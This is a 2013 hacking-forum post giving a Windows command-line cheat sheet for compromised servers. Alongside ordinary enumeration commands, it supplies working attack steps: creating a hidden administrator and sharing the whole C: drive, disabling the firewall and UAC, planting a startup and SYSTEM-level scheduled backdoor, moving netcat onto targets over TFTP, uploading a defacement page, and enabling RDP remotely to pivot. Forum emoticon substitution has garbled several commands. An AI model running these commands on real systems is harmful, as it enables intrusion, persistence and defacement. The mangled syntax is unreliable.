Welcome Guest! To enable all features please try to register or login.
Go to last post Go to first unread
Offline Dr-Hack  
#1 Posted : Friday, September 27, 2013 6:48:41 PM(UTC)

Rank: Administrator
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)

 A List of useful command line syntax which can be used on servers to find various important information

View Computers, Workgroups & Domains:

List Domain Controllers:
    Find Primary DC:
        NETDOM QUERY /D:MyDomain PDC

    DSQUERY Server
    Find primary DC: 
        NETDOM QUERY /D:mydomain.com FSMO

Check users logged on:

WMIC /Node:remotecomputer ComputerSystem Get UserName

Using REG.EXE:
Windows 2000|XP|2k3):
FOR /F %%A IN ('REG Query \\remotecomputer\HKU ˆ| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"'Wink DO (FOR /F "tokens=3 delims=\" %%B IN ('REG Query "\\remotecomputer\%%A\Volatile Environment"'Wink DO (SET LoggedinUser=%%B))

Windows 7:
FOR /F %%A IN ('REG Query \\remotecomputer\HKU /K /F "S-1-5-21-" ˆ| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"'Wink DO ('Wink DO (FOR /F "tokens=2*" %%B IN ('REG Query "\\remotecomputer\%%~A\Volatile Environment" /V "UserName" ˆ| FIND /V ":"'Wink DO (SET LoggedinUser=%%C))

net config workstation
    taskkill [/f] /pid <pid>
    taskkill [/f] /im <image_name>

schedule tasks:
echo %time%
    at <time+1min> /INTERACTIVE "cmd.exe"
    pops a SYSTEM level shell if not disabled, scheduled tasks can also be used...

whoami /all
net use
net localgroup
net localgroup <GROUP-NAME>
NET LOCALGROUP Administrators
net localgroup administrators /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net group “Domain Controllers” /domain
net group “Remote Desktop Users"

password policy info:
    net accounts
    net accounts /domain

Find out Group Membership for user:
DSQUERY USER -samid <loginname> | DSGET USER -memberof -expand

Check Directory Permissions for User:
CD /D d:\directory2check
    SHOWACLS /UBig Grinomain\userid

List Drives:
fsutil fsinfo drives

List Shares:
net share

Reset User Pass:
NET USER <loginname> <newpassword> /DOMAIN

on Srv2k3:
DSQUERY USER -samid <loginname> | DSMOD USER -pwd <newpassword>

Now make sure password never expires:
WMIC.EXE /Node:remotecomputer Path Win32_UserAccount Where Name="user" Set PasswordExpires="FALSE"

net user <USER-NAME> <PASS> /add
net localgroup administrators <USER-NAME> /add
net localgroup “Remote Desktop Users” <USER-NAME> /add
net share nothing$=C:\ /grant:<USER-NAME>,FULL /unlimited
    shares C drive and grans unlimited access to it for our new admin user....

***If the server is a member of a domain, we can go a step further and add a domain level user rather than a local one. This will have more reach within the organisation that a local user will, but it will also be much more visible to the IT team of the organisation that you're testing. Simply add "/DOMAIN" after first command above to add to domain level in addition to local level

re-enable a disabled account (perhaps an old admin account Wink):
    net user username /active:yes /domain

Tunnel RDP out on another port besides default port 3389, port 443 in this case:
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

simple change back to 3389 to return to default port. If you need to check if port is already in use or not you can use a quick "netstat -an | find <port#>"

**May need a restart or RDP Service restart to take affect

Firewall Info:
If you want to find out geenral info about the firewall, use this:
    netsh firewall show opmode

See list of port openings:
    netsh firewall show portopening

Add port opening in firewall, for port 455 for any service or program to use:
    netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Turn off built-in Windows firewall:
    netsh firewall set opmode disable
    SC [ \\Remote_computer ] Stop SharedAccess
    SC [ \\Remote_computer ] Config SharedAccess start= disabled

NetCat File Transfers:
Push a file from client to listener:
ncat –lv [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc –w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]

Pull file from listener back to client:
$ nc –l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc –w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]

TFTP File Transfers:
If it is not enabled, follow these 4 quick steps:
1 =>    copy %windir%\system32\dllcache\tftpd.exe %windir%\system32
2 =>    sc create tftpdsvc binPath= C:\Windows\System32\tftpd.exe DisplayName= "TFTP Server" start= auto
        Should see: "[SC] CreateService SUCCESS"
3 =>    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\tftpdsvc\Parameters /v Directory /t REG_SZ /d "C:\Documents and Settings\Administrator\Desktop\tftp"
4 =>     net start tftpdsvc

tftp [-i] [Host] [{get | put}] [Source] [Destination]

    -i: Specifies binary image transfer mode (also called octet mode). In binary image mode, the file         is transferred in one-byte units. Use this mode when transferring binary files. If -i is omitted,         the file is transferred in ASCII mode. This is the default transfer mode. This mode converts the 
    end-of-line (EOL) characters to an appropriate format for the specified computer. Use this mode when         transferring text files. If a file transfer is successful, the data transfer rate is displayed.

    Host: Specifies the local or remote computer.

    put: Transfers the file Destination on the local computer to the file Source on the remote computer.         Because the TFTP protocol does not support user authentication, the user must be logged onto the         remote computer, and the files must be writable on the remote computer.

    get: Transfers the file Destination on the remote computer to the file Source on the local computer.

    Source: Specifies the file to transfer.

    Destination: Specifies where to transfer the file. If Destination is omitted, it is assumed to have         the same name as Source.

    /?: Displays help at the command prompt. 

tftp GET /home/hood3drob1n/defaced.html index.html
    This will transfer the local file "defaced.html" from local to remote server and will re-name the         file as index.html on the remote server, which was identified as

tftp -i GET /home/hood3drob1n/evil/nc.exe
    This will grab a copy of nc.exe from

tftp -i PUT /home/hood3drob1n/evil/nc.exe /path/on/target/nc.exe
    This will copy local file nc.exe to the server at
If facing newer Windows Systems (Vista, 7, or Srv2008) you might need to disable CTCP protection to get working TFTP as CTCP has been known to cause issues with timeouts (not implemented in Linux or Windows XP)
    To disable enter this command: netsh interface tcp set global congestionprovider=none

TFTP Not enabled due to being newer system? No problem, re-enable using DISM Wink
dism (Deployment Image Servicing and Management Technical) allows command line control of services, I do it via a DOS script, but this is the key:
    dism /online /Enable-Feature /FeatureName:TelnetClient
    dism /online /Enable-Feature /FeatureName:TFTP

CMD FTP Remote Download:
echo open <site.com> > ftpscript.txt    (Optional, but if omitted the host/ip needs to be specified after script name in -s argument to identify target host properly)
echo <USER> >> ftpscript.txt
echo <PASS> >> ftpscript.txt
echo binary >> ftpscript.txt    (If next line points to a .exe use this line, otherwise not needed)
echo get <FILE> >> ftpscript.txt
echo quit >> ftpscript.txt
ftp -s:ftpscript.txt

Set Backdoor w/Firewall hole:
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe"  /ED 12/12/2012

Services Info:
To delete a Windows Service, simply type use the Service Control, or "sc", command with delete argument followed by the Service name
    sc delete <ServiceName>
        Use quotes if spaces in name: 
        sc delete “Apple Mobile Device”

You can use SC to query for all configured services on the box with simple command:
    sc query

All Services on windows can be found under this registry key: 

Start/Pause/Stop/Continue a Service
    SC <ServerName> Start|Pause|Stop|Continue <ServiceName>
        You can omit server name and assumes on localhost, but you can also leverage this to             interact with other systems services if you have elevated privileges
    SC Stop Scheduler
    SC Start Messenger
    SC \\W2k3SRV Pause W3Svc
    SC \\ Continue NTfrs

Disable UAC in Vista+:
%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Essentially we just set this registry key
        EnableLUA=0 to disable and EnableLUA=1 to re-enable UAC

Query for a specific Value of a Registry Key:

reg <option> [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] 

Check if RDP Enabled or not:
C:\> reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"


To re-enable RDP:
REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

If remote registry access is available, you can try tweaking internal machines as well to further pivot:
REG.exe ADD "\\MachineName\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

The machine typially needs to be rebooted for the change to take effect, so open a command prompt and type the following command:

    shutdown -m \\srv220 -r

Interface Device Info:
ipconfig /all
ipconfig /displaydns
arp -a
route print
type %WINDIR%\System32\drivers\etc\hosts

Group Policy Info:
gpresult /z

Rss Feed  Atom Feed
Users browsing this topic
You cannot post new topics in this forum.
You cannot reply to topics in this forum.
You cannot delete your posts in this forum.
You cannot edit your posts in this forum.
You cannot create polls in this forum.
You cannot vote in polls in this forum.